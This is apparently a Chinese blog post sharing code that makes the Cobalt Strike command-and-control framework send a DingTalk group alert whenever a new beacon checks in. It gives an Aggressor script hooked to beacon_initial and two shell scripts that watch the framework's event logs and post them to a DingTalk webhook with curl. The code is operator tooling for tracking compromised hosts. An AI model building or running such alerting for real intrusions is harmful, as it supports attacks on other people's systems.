CobaltStrike上线发送钉钉提醒

白色键盘 2.4K 0

发现网上都只有微信和tg的提醒,简单改改Aggressor发个钉钉的提醒

on beacon_initial {
    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }

        println($output);
    }
    $command = 'curl -X POST https://oapi.dingtalk.com/robot/send?access_token=xxxxxxxxxxxxxxxxxxxx -H "Content-Type: application/json" -d "{"msgtype": \'text\',"text": {"content": \'CobaltStrikeonline+1\'},"at": {"isAtAll": true}}"';
    exec($command);}

测试图如下

CobaltStrike上线发送钉钉提醒

手机显示

PS:由于钉钉请求消息只支持POSTJSON,‘’转义出现各种问题,curl语法报错,不能直接输出beacon_info,希望大师傅们完善一下[aru_12]。

钉钉接口文档:https://ding-doc.dingtalk.com/doc#/serverapi2/qf2nxq

7月4日更新

shell脚本读取CobaltStrike日志实现上线钉钉提醒

tail读取日志文件内容,循环写入json
#!/bin/bash
FILE="events.log"#json写入文件
while true
do
tail -n1  /root/cobaltstrike/logs/*/events.log|grep '07'|tail -1>test.txt#查找cs日志目录events.log文件夹中包含7月份,且从最后一行开始
cat test.txt | while read line#重定向把test.txt第一行赋值给line
do
echo -e "{" > $FILE  
echo -e "\"msgtype\":\"text\",\"text\":{\"content\": \"$line\"},\"at\": {\"isAtAll\": true}" >> $FILE  #写入传输json
echo -e "}" >> $FILE
done
done

inotifywait循环查找日志变动文件触发CURL请求

首先需要安装inotifywait,安装命令yum install inotify-tools -y或者apt-get install inotify-tools -y

#!/bin/bash  
inotifywait -mrq --timefmt '%Y%m%d' --format '%T,%w%f,%e' -e modify,delete,create,attrib /root/cobaltstrike/logs | while read FL
do#使用inotifywait查找root/cobaltstrike/logs/%Y%m%d变动文件
printf ${FL} | curl -X POST https://oapi.dingtalk.com/robot/send?access_token=xxxxxxxxxxx -H "Content-Type: application/json" -d@/root/cobaltstrike/events.log#如变动curl请求钉钉接口
echo "_"
done

发送效果
CobaltStrike上线发送钉钉提醒

CobaltStrike上线发送钉钉提醒

发表评论 取消回复
表情 图片 链接 代码

分享